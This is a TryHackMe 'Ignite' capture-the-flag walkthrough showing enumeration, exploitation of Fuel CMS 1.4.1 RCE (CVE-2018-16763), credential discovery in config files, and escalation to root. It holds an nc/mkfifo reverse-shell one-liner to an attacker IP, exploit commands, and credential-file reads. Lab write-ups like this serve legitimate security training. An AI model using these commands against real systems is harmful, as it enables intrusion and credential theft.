Papadope Course
EN | ΕΛ

Ignite - TryHackMe Walkthrough

Ignite - TryHackMe Walkthrough

A beginner-friendly boot2root machine focused on Fuel CMS 1.4.1 remote code execution (CVE-2018-16763), post-exploitation credential discovery, and privilege escalation through credential reuse.

Room URL: https://tryhackme.com/room/ignite

Difficulty: Easy

Tools & Techniques Used

  • Nmap
  • Browser enumeration
  • robots.txt inspection
  • Searchsploit / Exploit-DB
  • Python RCE exploit (50477.py)
  • Netcat (reverse shell)
  • Linux enumeration
  • Credential reuse for privilege escalation

Step-by-Step Walkthrough

1. Enumeration

Run a full TCP scan:

nmap -p- -T4 -vv <TARGET_IP>

Then do service/version detection:

nmap -sC -sV -p80 <TARGET_IP>

Typical findings:

Port Service Notes
80 HTTP Apache web server hosting Fuel CMS

Browse to http://<TARGET_IP> and inspect the landing page.

The site reveals Fuel CMS setup information and version details.

Check robots.txt:

http:///robots.txt

Key discovery:

  • /fuel (admin login path)

2. Initial Access to CMS

Navigate to:

http:///fuel

Use the default credentials shown in the Fuel CMS getting-started information and access the admin dashboard.

At this stage, direct admin panel actions may not immediately provide shell access, so move to exploit research.

3. Vulnerability Discovery

Fuel CMS 1.4.1 is vulnerable to unauthenticated RCE (CVE-2018-16763).

Find exploit locally:

searchsploit fuel cms
searchsploit -m php/webapps/50477.py

This exploit targets unsafe input handling in the filter parameter under /fuel/pages/select/.

4. Exploitation (RCE)

Run the exploit against the target:

python3 50477.py -u http://<TARGET_IP>

Validate command execution:

whoami
id
ls

You should confirm code execution as www-data.

Note: Some commands can return odd output because the exploit wraps execution through PHP system().

5. Post-Exploitation

Enumerate and retrieve application credentials from Fuel config:

cat fuel/application/config/database.php

This file typically leaks database credentials and often reused passwords.

Find and read the user flag:

ls /home/www-data
cat /home/www-data/flag.txt

For a more stable shell, spawn a reverse shell (set your own IP/port):

rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc <YOUR_IP> 1234 > /tmp/f

Listener on attacker box:

nc -lvnp 1234

6. Privilege Escalation

If su fails with “must be run from a terminal”, spawn a pseudo-TTY:

python -c 'import pty; pty.spawn("/bin/sh")'

Then try root login with discovered/reused credentials:

su root

If successful, confirm and get root flag:

id
cat /root/root.txt

Notes

  • Keep exploitation strictly in legal labs/authorized targets.
  • Key lessons:
    • Version disclosure can quickly lead to known CVEs.
    • Config files often leak reusable credentials.
    • Stabilizing shells (PTY/reverse shell) is often necessary for reliable post-exploitation.
Previous Bounty Hacker - TryHackMe Walkthrough Next LazyAdmin - TryHackMe Walkthrough